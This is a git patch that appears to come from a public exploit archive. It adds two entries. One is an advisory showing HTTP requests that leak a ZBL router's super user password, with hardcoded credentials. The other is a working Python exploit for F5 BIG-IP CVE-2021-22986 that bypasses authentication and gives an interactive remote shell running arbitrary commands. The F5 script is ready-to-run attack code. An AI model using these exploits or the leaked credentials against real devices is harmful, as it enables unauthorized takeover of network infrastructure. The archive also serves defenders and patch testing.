From cbe5b3f2e5c763fce3bd2fe0d7aa4d763afe35c4 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 3 Apr 2021 05:01:57 +0000 Subject: [PATCH] DB: 2021-04-03 2 changes to exploits/shellcodes ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated) --- exploits/hardware/webapps/49737.txt | 82 +++++++++++++++++++++++++ exploits/hardware/webapps/49738.py | 92 +++++++++++++++++++++++++++++ files_exploits.csv | 2 + 3 files changed, 176 insertions(+) create mode 100644 exploits/hardware/webapps/49737.txt create mode 100755 exploits/hardware/webapps/49738.py diff --git a/exploits/hardware/webapps/49737.txt b/exploits/hardware/webapps/49737.txt new file mode 100644 index 000000000..7c409d555 --- /dev/null +++ b/exploits/hardware/webapps/49737.txt @@ -0,0 +1,82 @@ +# Exploit Title: ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation +# Date: 31.01.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.zblchina.com http://www.wd-thailand.com + +Vendor: Zhejiang BC&TV Technology Co., Ltd. (ZBL) | W&D Corporation (WAD TECHNOLOGY (THAILAND)) +Product web page: http://www.zblchina.com | http://www.wd-thailand.com +Affected version: Firmwre: V100R001 + Software model: HG104B-ZG-E / EONU-7114 / ZBL5932C CATV+PON Triple CPE + EONU Hardware Version V3.0 + Software: V2.46.02P6T5S + Main Chip: RTL9607 + Master Controller, Copyright (c) R&D + +Summary: EONU-x GEPON ONU layer-3 home gateway/CPE broadband +router. + +Desc: The application suffers from a privilege escalation +vulnerability. The limited administrative user (admin:admin) +can elevate his/her privileges by sending a HTTP GET request +to the configuration backup endpoint or the password page +and disclose the http super user password. Once authenticated +as super, an attacker will be granted access to additional and +privileged functionalities. + +Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5467 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5647.php + + +31.01.2021 + +-- + + +Get config file and disclose super pwd: +--------------------------------------- + +POST /HG104B-ZG-E.config HTTP/1.1 +Host: 192.168.1.1 +Connection: keep-alive +Content-Length: 42 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: https://192.168.1.1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: https://192.168.1.1/system_configure.asp +Accept-Encoding: gzip, deflate, br +Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6 + +CMD=CONFIG&GO=index.asp&TYPE=CONFIG&files= + + +... + #web_1 + user_web_name=super + user_web_password=www168nettv +... + + +Disclose super pwd from system pwd page: +---------------------------------------- + +GET /system_password.asp +Host: 192.168.1.1 + +... +var webVars = new Array( 'HG104B-ZG-E', '1', '0','2;1;2'); +var sysadmin = new Array('600','1;super;www168nettv','1;admin;admin'); +... \ No newline at end of file diff --git a/exploits/hardware/webapps/49738.py b/exploits/hardware/webapps/49738.py new file mode 100755 index 000000000..0ca7f316a --- /dev/null +++ b/exploits/hardware/webapps/49738.py @@ -0,0 +1,92 @@ +# Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated) +# Exploit Author: Al1ex +# Vendor Homepage: https://www.f5.com/products/big-ip-services +# Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2 +# CVE : CVE-2021-22986 + +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) +import sys + + +def title(): + print(''' + ______ ____ ____ _______ ___ ___ ___ __ ___ ___ ___ ___ __ + / |\ \ / / | ____| |__ \ / _ \ |__ \ /_ | |__ \ |__ \ / _ \ / _ \ / / + | ,----' \ \/ / | |__ ______ ) | | | | | ) | | | ______ ) | ) | | (_) | | (_) | / /_ + | | \ / | __| |______/ / | | | | / / | | |______/ / / / \__, | > _ < | '_ \ + | `----. \ / | |____ / /_ | |_| | / /_ | | / /_ / /_ / / | (_) | | (_) | + \______| \__/ |_______| |____| \___/ |____| |_| |____| |____| /_/ \___/ \___/ + + Author:Al1ex@Heptagram + Github:https://github.com/Al1ex + ''') + +def exploit(url): + target_url = url + '/mgmt/shared/authn/login' + data = { + "bigipAuthCookie":"", + "username":"admin", + "loginReference":{"link":"/shared/gossip"}, + "userReference":{"link":"https://localhost/mgmt/shared/authz/users/admin"} + } + headers = { + "User-Agent": "hello-world", + "Content-Type":"application/x-www-form-urlencoded" + } + response = requests.post(target_url, headers=headers, json=data, verify=False, timeout=15) + if "/mgmt/shared/authz/tokens/" not in response.text: + print('(-) Get token fail !!!') + print('(*) Tested Method 2:') + header_2 = { + 'User-Agent': 'hello-world', + 'Content-Type': 'application/json', + 'X-F5-Auth-Token': '', + 'Authorization': 'Basic YWRtaW46QVNhc1M=' + } + data_2 = { + "command": "run", + "utilCmdArgs": "-c whoami" + } + check_url = url + '/mgmt/tm/util/bash' + try: + response2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20) + if response2.status_code == 200 and 'commandResult' in response2.text: + while True: + cmd = input("(:CMD)> ") + data_3 = {"command": "run", "utilCmdArgs": "-c '%s'"%(cmd)} + r = requests.post(url=check_url, json=data_3, headers=header_2, verify=False) + if r.status_code == 200 and 'commandResult' in r.text: + print(r.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', '')) + else: + print('(-) Not vuln...') + exit(0) + except Exception: + print('ERROR Connect') + print('(+) Extract token: %s'%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0])) + while True: + cmd = input("(:CMD)> ") + headers = { + "Content-Type": "application/json", + "X-F5-Auth-Token": "%s"%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0]) + } + data_json = { + "command": "run", + "utilCmdArgs": "-c \'%s\'"%(cmd) + } + exp_url= url + '/mgmt/tm/util/bash' + exp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15) + if exp_req.status_code == 200 and 'commandResult' in exp_req.text: + print(exp_req.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', '')) + else: + print('(-) Not vuln...') + exit(0) + +if __name__ == '__main__': + title() + if(len(sys.argv) < 2): + print('[+] USAGE: python3 %s https://\n'%(sys.argv[0])) + exit(0) + else: + exploit(sys.argv[1]) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 13442679f..1768a8f91 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43914,3 +43914,5 @@ id,file,description,date,author,type,platform,port 49734,exploits/windows/webapps/49734.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1)",2021-04-01,"Fellipe Oliveira",webapps,windows, 49736,exploits/multiple/webapps/49736.txt,"phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)",2021-04-01,"Valerio Severini",webapps,multiple, 49735,exploits/linux/webapps/49735.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2)",2021-04-01,"Fellipe Oliveira",webapps,linux, +49737,exploits/hardware/webapps/49737.txt,"ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation",2021-04-02,LiquidWorm,webapps,hardware, +49738,exploits/hardware/webapps/49738.py,"F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)",2021-04-02,Al1ex,webapps,hardware,